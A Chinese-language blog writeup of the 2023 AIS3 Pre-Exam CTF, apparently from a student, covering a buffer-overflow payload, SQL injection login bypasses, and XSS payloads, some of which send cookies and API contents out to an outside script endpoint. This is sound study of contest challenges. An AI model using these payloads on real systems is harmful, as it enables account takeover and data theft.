<!doctype html>
<html lang="zh"><head><!-- hexo injector head_begin start --><!-- Microsoft Clarity begins-->
    <script type="text/javascript">
        (function(c,l,a,r,i,t,y){
            c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
            t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
            y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
        })(window, document, "clarity", "script", "nq90i0uzl9");
    </script>
    <!-- Microsoft Clarity ends-->
    <!-- Google tag (gtag.js) begins-->
    <script async src="https://www.googletagmanager.com/gtag/js?id=AW-16453505124"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
    
      gtag('config', 'AW-16453505124');
    </script>
    <!-- Google tag (gtag.js) ends-->
    <!-- hexo injector head_begin end --><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>2023 AIS3 Pre-Exam writeup - TriangeSnake&#039;s Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="TriangeSnake&#039;s Blog"><meta name="msapplication-TileImage" content="/img/trianglesnake.svg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="TriangeSnake&#039;s Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="MiscWelcomeAre you not a robot ? FLAG Format: ^AIS3&amp;#123;[A-Z0-9+-*&amp;#x2F;!?-]+&amp;#125;$  Author: nella17  點開pdf，flag直接寫在上面了，一開始以為-是_結果浪費一堆時間  AIS3{WELC0ME-T0-2023-PRE-EXAM-&amp;amp;-MY-FIRST-CTF}  RobotAre you a"><meta property="og:type" content="blog"><meta property="og:title" content="2023 AIS3 Pre-Exam writeup"><meta property="og:url" content="https://trianglesnake.com/2024/02/07/2023-AIS3-Pre-Exam-writeup/"><meta property="og:site_name" content="TriangeSnake&#039;s Blog"><meta property="og:description" content="MiscWelcomeAre you not a robot ? FLAG Format: ^AIS3&amp;#123;[A-Z0-9+-*&amp;#x2F;!?-]+&amp;#125;$  Author: nella17  點開pdf，flag直接寫在上面了，一開始以為-是_結果浪費一堆時間  AIS3{WELC0ME-T0-2023-PRE-EXAM-&amp;amp;-MY-FIRST-CTF}  RobotAre you a"><meta property="og:locale" content="zh_TW"><meta property="og:image" content="https://hackmd.io/_uploads/rkpBv0QHh.png"><meta property="og:image" content="https://hackmd.io/_uploads/H1wvwAmHh.png"><meta property="og:image" content="https://hackmd.io/_uploads/ryndPC7S2.png"><meta property="og:image" content="https://hackmd.io/_uploads/rkAxgsVH2.png"><meta property="og:image" content="https://hackmd.io/_uploads/B1syQsNBn.png"><meta property="og:image" content="https://hackmd.io/_uploads/ByImUsEB3.png"><meta property="og:image" content="https://hackmd.io/_uploads/S19GtoVrh.png"><meta property="og:image" content="https://hackmd.io/_uploads/HkNT5jNrh.png"><meta property="og:image" content="https://hackmd.io/_uploads/HJDHTiNSn.png"><meta property="og:image" content="https://hackmd.io/_uploads/B10RnhEr2.png"><meta property="og:image" content="https://hackmd.io/_uploads/S1kMT2NSh.png"><meta property="og:image" content="https://hackmd.io/_uploads/ryusahEB3.png"><meta property="article:published_time" content="2024-02-07T07:24:52.000Z"><meta property="article:modified_time" content="2024-11-17T04:45:19.226Z"><meta property="article:author" content="TriangleSnake"><meta property="article:tag" content="writeup"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://hackmd.io/_uploads/rkpBv0QHh.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://trianglesnake.com/2024/02/07/2023-AIS3-Pre-Exam-writeup/"},"headline":"2023 AIS3 Pre-Exam writeup","image":["https://hackmd.io/_uploads/rkpBv0QHh.png","https://hackmd.io/_uploads/H1wvwAmHh.png","https://hackmd.io/_uploads/ryndPC7S2.png","https://hackmd.io/_uploads/rkAxgsVH2.png","https://hackmd.io/_uploads/B1syQsNBn.png","https://hackmd.io/_uploads/ByImUsEB3.png","https://hackmd.io/_uploads/S19GtoVrh.png","https://hackmd.io/_uploads/HkNT5jNrh.png","https://hackmd.io/_uploads/HJDHTiNSn.png","https://hackmd.io/_uploads/B10RnhEr2.png","https://hackmd.io/_uploads/S1kMT2NSh.png","https://hackmd.io/_uploads/ryusahEB3.png"],"datePublished":"2024-02-07T07:24:52.000Z","dateModified":"2024-11-17T04:45:19.226Z","author":{"@type":"Person","name":"TriangleSnake"},"publisher":{"@type":"Organization","name":"TriangeSnake's Blog","logo":{"@type":"ImageObject","url":"https://trianglesnake.com/img/triblog.svg"}},"description":"MiscWelcomeAre you not a robot ? FLAG Format: ^AIS3&#123;[A-Z0-9+-*&#x2F;!?-]+&#125;$  Author: nella17  點開pdf，flag直接寫在上面了，一開始以為-是_結果浪費一堆時間  AIS3{WELC0ME-T0-2023-PRE-EXAM-&amp;-MY-FIRST-CTF}  RobotAre you a"}</script><link rel="canonical" href="https://trianglesnake.com/2024/02/07/2023-AIS3-Pre-Exam-writeup/"><link rel="icon" href="/img/trianglesnake.svg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body class="is-2-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/triblog.svg" alt="TriangeSnake&#039;s Blog" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/categories">Categories</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/trianglesnake"><i class="fab fa-github"></i></a><a class="navbar-item search" title="搜尋" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2024-02-07T07:24:52.000Z" title="2024/2/7 下午3:24:52">2024-02-07</time>發表</span><span class="level-item"><time dateTime="2024-11-17T04:45:19.226Z" title="2024/11/17 下午12:45:19">2024-11-17</time>更新</span><span class="level-item"><a class="link-muted" href="/categories/Cybersecurity/">Cybersecurity</a><span> / </span><a class="link-muted" href="/categories/Cybersecurity/CTF/">CTF</a><span> / </span><a class="link-muted" href="/categories/Cybersecurity/CTF/Writeup/">Writeup</a></span><span class="level-item">11 分鐘讀完 (大約1637個字)</span></div></div><h1 class="title is-3 is-size-4-mobile">2023 AIS3 Pre-Exam writeup</h1><div class="content"><h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="Welcome"><a href="#Welcome" class="headerlink" title="Welcome"></a>Welcome</h2><pre><code>Are you not a robot ?
FLAG Format: ^AIS3&#123;[A-Z0-9+-*/!?-]+&#125;$

Author: nella17
</code></pre>
<p>點開pdf，flag直接寫在上面了，一開始以為-是_結果浪費一堆時間</p>
<blockquote>
<p>AIS3{WELC0ME-T0-2023-PRE-EXAM-&amp;-MY-FIRST-CTF}</p>
</blockquote>
<h2 id="Robot"><a href="#Robot" class="headerlink" title="Robot"></a>Robot</h2><pre><code>Are you a robot?

Note: This is NOT a reversing or pwn challenge. Don&#39;t reverse the 
binary. It is for local testing only. You will actually get the flag 
after answering all the questions. You can practice locally by running 
./robot AIS3&#123;fake_flag&#125; 127.0.0.1 1234 and it will run the service on 
localhost:1234.

Author: toxicpie

nc chals1.ais3.org 12348
</code></pre>
<p>機器人會問你三十題數學，可以直接寫Python用eval()解<br>在discord看到有人說直接用手解，牛皮</p>
<h3 id="exploit-code"><a href="#exploit-code" class="headerlink" title="exploit code"></a>exploit code</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pwn</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">io=pwn.remote(<span class="string">&quot;chals1.ais3.org&quot;</span>,<span class="number">12348</span>)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(io.recvuntil(<span class="string">&quot;!&quot;</span>))</span><br><span class="line">time.sleep(<span class="number">0.5</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">30</span>):</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;solving..<span class="subst">&#123;i+<span class="number">1</span>&#125;</span>&quot;</span>)</span><br><span class="line">    string=io.recv().decode()</span><br><span class="line">    string=string.strip(<span class="string">&quot; &quot;</span>).strip(<span class="string">&quot;\n&quot;</span>)</span><br><span class="line">    <span class="built_in">print</span>(string,<span class="built_in">eval</span>(string))</span><br><span class="line">    io.sendline(<span class="built_in">str</span>(<span class="built_in">eval</span>(string)))</span><br><span class="line">    time.sleep(<span class="number">0.5</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/rkpBv0QHh.png"></p>
<blockquote>
<p>AIS3{don’t_eval_unknown_code_or_pipe_curl_to_sh}<br>被罵了</p>
</blockquote>
<h1 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h1><h2 id="Simply-Pwn"><a href="#Simply-Pwn" class="headerlink" title="Simply Pwn"></a>Simply Pwn</h2><pre><code>The simplest pwn

nc chals1.ais3.org 11111
</code></pre>
<p>經典buffer overflow</p>
<h3 id="先用gdb觀察"><a href="#先用gdb觀察" class="headerlink" title="先用gdb觀察"></a>先用gdb觀察</h3><p>ni到read附近</p>
<p><img src="https://hackmd.io/_uploads/H1wvwAmHh.png"></p>
<p>可以發現輸入變數存在<strong>rsi&#x3D;rbp-0x50+0x9&#x3D;rbp-0x47</strong></p>
<p>所以必須墊<strong>0x47+8byte(RSP)+address</strong>，剛好可以覆蓋return address</p>
<p><img src="https://hackmd.io/_uploads/ryndPC7S2.png"></p>
<p>直接讓程式跳到shellcode</p>
<h3 id="exploit-code-1"><a href="#exploit-code-1" class="headerlink" title="exploit code"></a>exploit code</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pwn</span><br><span class="line">io=pwn.remote(<span class="string">&quot;chals1.ais3.org&quot;</span>,<span class="number">11111</span>)</span><br><span class="line">payload=<span class="string">b&quot;a&quot;</span>*(<span class="number">0x4f</span>)+pwn.p64(<span class="number">0x4017a5</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<blockquote>
<p>AIS3{5imP1e_Pwn_4_beGinn3rs!}</p>
</blockquote>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="Login-Panel"><a href="#Login-Panel" class="headerlink" title="Login Panel"></a>Login Panel</h2><pre><code>Login Panel 網站採用了隱形 reCAPTCHA 作為防護機制，以確保只有人類的使用者能夠登入
admin 的帳號。你的任務是找到一個方法來繞過 reCAPTCHA，成功登入 admin 的帳號。

你可以使用各種技術和手段來達成目標，可能需要進行一些網站分析、程式碼解讀或其他形式的
攻擊。請注意，你需要遵守道德規範，不得進行任何非法或有害的行為。

當你成功登入 admin 的帳號後，你將能夠獲得 FLAG。請將 FLAG 提交至挑戰平台，以證明
你的成功。

Author: Ching367436

http://chals1.ais3.org:8000/
</code></pre>
<p>直接讀source code</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">db.<span class="title function_">get</span>(<span class="string">`SELECT * FROM Users WHERE username = &#x27;<span class="subst">$&#123;username&#125;</span>&#x27; AND password = &#x27;<span class="subst">$&#123;password&#125;</span>&#x27;`</span></span><br></pre></td></tr></table></figure>

<p>聞起來就很有SQL injection的味道</p>
<h3 id="Bypass-Login-Page"><a href="#Bypass-Login-Page" class="headerlink" title="Bypass Login Page"></a>Bypass Login Page</h3><p>注入<strong>username</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username<span class="operator">=</span><span class="string">&#x27; or &#x27;</span>a<span class="string">&#x27;=&#x27;</span>a</span><br></pre></td></tr></table></figure>
<p>中計直接被Redirect到rickroll</p>
<p><strong>ok不然改注password</strong></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">username<span class="operator">=</span>admin<span class="operator">&amp;</span>password<span class="operator">=</span><span class="string">&#x27; or &#x27;</span>a<span class="string">&#x27;=&#x27;</span>a</span><br></pre></td></tr></table></figure>

<p>成功進入之後還有2fa認證，要輸入2fa code才能進到dashboard看flag，但是仔細看其實驗證完之後他也只是redirect到&#x2F;dashboard而已，所以直接存取&#x2F;dashboard即可</p>
<blockquote>
<p>AIS3{‘ UNION SELECT 1, 1, 1, 1 WHERE ({condition})–}</p>
</blockquote>
<h2 id="E-Portfolio-baby"><a href="#E-Portfolio-baby" class="headerlink" title="E-Portfolio baby"></a>E-Portfolio baby</h2><pre><code>AIS3 E-Portfolio 是一個學習成就展示平台，讓使用者可以建立並分享他們在 AIS3 的學習成果和專
案作品。其中，網站提供了一個「Share your portfolio with admin」的功能，讓使用者可以將自
己的作品集分享給管理員。

你需要找出一個前端漏洞，當你分享作品集給管理員時，能夠竊取 admin 的旗幟。你可以透過探索網站
的前端程式碼，找到適當的方式來觸發漏洞並取得旗幟。

請注意，你需要在漏洞設計中保持合法並遵循道德原則。請勿以任何方式傷害網站的正常運作或使用者的隱私。

對了，按下「Share your portfolio with admin」的按鈕的時候，admin 會去拜訪的頁面會是
http://url/share?username=&#123;按下那個按鈕的使用者名稱&#125;。

Author: Ching367436

http://chals1.ais3.org:8880/
</code></pre>
<p>看到share to admin就知道這是csrf題目<br>先戳戳看</p>
<h3 id="測試XSS"><a href="#測試XSS" class="headerlink" title="測試XSS"></a>測試XSS</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert()&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>沒反應，因為寫上文字是使用innerHTML，所以對 <strong>&lt;script&gt;</strong> 標籤不起作用</p>
<figure class="highlight jsx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (data.<span class="property">success</span>) &#123;</span><br><span class="line">                        username.<span class="property">innerHTML</span> = data.<span class="property">data</span>.<span class="property">username</span></span><br><span class="line">                        about.<span class="property">innerHTML</span> = data.<span class="property">data</span>.<span class="property">about</span></span><br><span class="line">                        avatar.<span class="property">src</span> = data.<span class="property">data</span>.<span class="property">avatar</span></span><br><span class="line">                    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                        <span class="title function_">alert</span>(data.<span class="property">message</span>)</span><br><span class="line">                    &#125;</span><br></pre></td></tr></table></figure>
<p>用 <strong>&lt;img src&gt;</strong> 試試</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;123&quot; onerror=alert()&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/rkAxgsVH2.png"><br>果然出現XSS</p>
<h3 id="嘗試當cookie小偷"><a href="#嘗試當cookie小偷" class="headerlink" title="嘗試當cookie小偷"></a>嘗試當cookie小偷</h3><p><strong>一開始的思路是當cookie小偷，然後用admin登入看flag藏在哪</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&#x27;&#x27; onerror=fetch(&#x27;https://script.google.com/macros/s/\</span><br><span class="line">                           AKfycbxFRZIq7zd9X5gpd9MNCIe9m6d_GwrT3kY9vkVH8hPXic7pbr-\</span><br><span class="line">                           pW0B8vTj0lureCaOdOA/exec?\</span><br><span class="line">                           text=cookie:&#x27;+encodeURI(document.cookie))&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/B1syQsNBn.png"><br>因為有設定HTTP only所以偷不到cookie(後來發現偷到也沒用，flag不在admin的頁面裡面)</p>
<h3 id="嘗試直接偷api內容"><a href="#嘗試直接偷api內容" class="headerlink" title="嘗試直接偷api內容"></a>嘗試直接偷api內容</h3><p>看sauce code會發現其實flag寫在admin的密碼裡面，然後密碼又透過api&#x2F;portfolio傳遞<br><img src="https://hackmd.io/_uploads/ByImUsEB3.png"></p>
<p>ok開偷</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;123&quot; onerror=&quot;fetch(&#x27;api/portfolio&#x27;)</span><br><span class="line">      .then(response =&gt;response.text()).then(text=&gt;&#123;</span><br><span class="line">        var url=</span><br><span class="line">            &#x27;https://script.google.com/macros/s/\</span><br><span class="line">            AKfycbxFRZIq7zd9X5gpd9MNCIe9m6d_GwrT3kY9vkVH8hPXic7pbr-\</span><br><span class="line">            pW0B8vTj0lureCaOdOA/exec?text=&#x27;</span><br><span class="line">        fetch(url+encodeURI(text))</span><br><span class="line">      &#125;)&quot;&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/S19GtoVrh.png"><br>在瀏覽器上測試成功，但share to admin甚麼事都沒發生</p>
<p><img src="https://hackmd.io/_uploads/HkNT5jNrh.png"><br>網站沒有設定CSP，所以應該是機器人沒辦法訪問外網</p>
<h3 id="嘗試寫入自己的page"><a href="#嘗試寫入自己的page" class="headerlink" title="嘗試寫入自己的page"></a>嘗試寫入自己的page</h3><p>沒辦法直接用webhook就變很複雜了</p>
<p><strong>改變絲路:</strong><br>偷到api&#x2F;portfolio-&gt;登入自己的帳號-&gt;寫入textarea-&gt;儲存</p>
<p><em><strong>創建登入form</strong></em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;form id=form action=&quot;/api/login&quot; method=&quot;post&quot; target=&quot;_blank&quot;&gt;</span><br><span class="line">    &lt;input name=&quot;username&quot; value=&quot;test123&quot;&gt;</span><br><span class="line">    &lt;input name=&quot;password&quot; value=&quot;test&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>
<p><em><strong>先偷api&#x2F;portfolio再submit表單切成自己帳號，最後改textarea、click save</strong></em></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=&quot;123&quot; onerror=&quot;fetch(&#x27;http://web:8000/api/portfolio&#x27;)</span><br><span class="line">      .then(response =&gt;response.text()).then(text=&gt;&#123;</span><br><span class="line">        form.submit()</span><br><span class="line">        setTimeout(function() &#123;</span><br><span class="line">        console.log(&#x27;123&#x27;);</span><br><span class="line">        &#125;, 1000);    </span><br><span class="line">        var win=window.open(&#x27;http://web:8000/portfolio&#x27;)</span><br><span class="line">        setTimeout(() =&gt; &#123;</span><br><span class="line">        win.document.querySelector(&#x27;textarea[id=about]&#x27;).value = text;</span><br><span class="line">        win.document.querySelector(&#x27;button[id=save]&#x27;).click()</span><br><span class="line">    &#125;, 1000)</span><br><span class="line">      &#125;)&quot;&gt;</span><br></pre></td></tr></table></figure>
<p><img src="https://hackmd.io/_uploads/HJDHTiNSn.png"></p>
<blockquote>
<p>AIS3{&lt;img src&#x3D;x onerror&#x3D;’fetch(…}</p>
</blockquote>
<h1 id="Reverse"><a href="#Reverse" class="headerlink" title="Reverse"></a>Reverse</h1><h2 id="Simply-Reverse"><a href="#Simply-Reverse" class="headerlink" title="Simply Reverse"></a>Simply Reverse</h2><pre><code>Just reverse it!
</code></pre>
<h3 id="先執行看看"><a href="#先執行看看" class="headerlink" title="先執行看看"></a>先執行看看</h3><p><img src="https://hackmd.io/_uploads/B10RnhEr2.png"></p>
<p><img src="https://hackmd.io/_uploads/S1kMT2NSh.png"></p>
<h3 id="丟ghidra"><a href="#丟ghidra" class="headerlink" title="丟ghidra"></a>丟ghidra</h3><p><img src="https://hackmd.io/_uploads/ryusahEB3.png"><br>這邊有一個verify函式判斷key是否正確</p>
<h3 id="解題絲路"><a href="#解題絲路" class="headerlink" title="解題絲路"></a>解題絲路</h3><pre><code>因為verify()的迴圈每跑一圈就會檢查一個char，一直到local_c=0x22 然後return true;
所以可以brute force 跑每個字元然後看迴圈有沒有炸掉
</code></pre>
<h3 id="exploit-code-2"><a href="#exploit-code-2" class="headerlink" title="exploit code"></a>exploit code</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pwn</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">io=pwn.process(<span class="string">&quot;gdb&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">&quot;file rev&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">&quot;start&quot;</span>)</span><br><span class="line">io.sendline(<span class="string">&quot;b *0x5555555551fb&quot;</span>)    <span class="comment">#把breakpoint 設在迴圈裏面，如果沒有停代表是錯的</span></span><br><span class="line">io.recvrepeat(timeout=<span class="number">1</span>)</span><br><span class="line">flag=<span class="string">&quot;AIS3&#123;&quot;</span></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x20</span>,<span class="number">0x7E</span>):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&quot;trying..&quot;</span>,flag+<span class="built_in">chr</span>(i))</span><br><span class="line">        io.sendline(<span class="string">f&quot;set args <span class="subst">&#123;flag+<span class="built_in">chr</span>(i)&#125;</span>&quot;</span>)</span><br><span class="line">        io.sendline(<span class="string">&quot;run&quot;</span>)</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(flag)+<span class="number">1</span>):</span><br><span class="line">            io.sendline(<span class="string">&quot;c&quot;</span>)</span><br><span class="line">        io.recvrepeat(timeout=<span class="number">0.3</span>).decode()</span><br><span class="line">        io.sendline(<span class="string">&quot;x/x $rbp-0x4&quot;</span>)</span><br><span class="line">        string=io.recv().decode()</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;No&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> string:</span><br><span class="line">            flag+=<span class="built_in">chr</span>(i)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">    </span><br></pre></td></tr></table></figure>
<blockquote>
<p>AIS3{0ld_Ch@1_R3V1_fr@m_AIS32016!}</p>
</blockquote>
<h1 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h1><h2 id="Fernet"><a href="#Fernet" class="headerlink" title="Fernet"></a>Fernet</h2><pre><code>你所在的公司最近發生了一起駭客入侵事件，管理員發現駭客使用 Fernet 密碼學來加密了他們的敏感數據。
你需要解開被加密的檔案，否則事情就大條了！

flag format : FLAG&#123;xxx&#125;

Auther : Richard ( dogxxx)
</code></pre>
<h3 id="看code"><a href="#看code" class="headerlink" title="看code"></a>看code</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">from</span> cryptography.fernet <span class="keyword">import</span> Fernet</span><br><span class="line"><span class="keyword">from</span> Crypto.Hash <span class="keyword">import</span> SHA256</span><br><span class="line"><span class="keyword">from</span> Crypto.Protocol.KDF <span class="keyword">import</span> PBKDF2</span><br><span class="line"><span class="keyword">from</span> secret <span class="keyword">import</span> FLAG</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">encrypt</span>(<span class="params">plaintext, password</span>):</span><br><span class="line">    salt = os.urandom(<span class="number">16</span>)  </span><br><span class="line">    key = PBKDF2(password.encode(), salt, <span class="number">32</span>, count=<span class="number">1000</span>, hmac_hash_module=SHA256)  </span><br><span class="line">    f = Fernet(base64.urlsafe_b64encode(key))  </span><br><span class="line">    ciphertext = f.encrypt(plaintext.encode())  </span><br><span class="line">    <span class="keyword">return</span> base64.b64encode(salt + ciphertext).decode()</span><br><span class="line"></span><br><span class="line"><span class="comment"># Usage:</span></span><br><span class="line">leak_password = <span class="string">&#x27;mysecretpassword&#x27;</span></span><br><span class="line">plaintext = FLAG</span><br><span class="line"></span><br><span class="line"><span class="comment"># Encrypt</span></span><br><span class="line">ciphertext = encrypt(plaintext, leak_password)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;Encrypted data:&quot;</span>,ciphertext)</span><br></pre></td></tr></table></figure>
<h3 id="絲路"><a href="#絲路" class="headerlink" title="絲路"></a>絲路</h3><pre><code>密碼都給你了所以反著解密就好了
</code></pre>
<p>加密流程是:產生salt-&gt;產生key-&gt;用key加密flag-&gt;把salt+ciphertext用base64 encode起來<br>所以其實salt也給你了就是base64 decode後的前16個char</p>
<h3 id="decrypt-code"><a href="#decrypt-code" class="headerlink" title="decrypt code"></a>decrypt code</h3><p>解密流程:base64 decode-&gt;取得salt、ciphertext-&gt;用password、salt重建key-&gt;用key解密ciphertext</p>
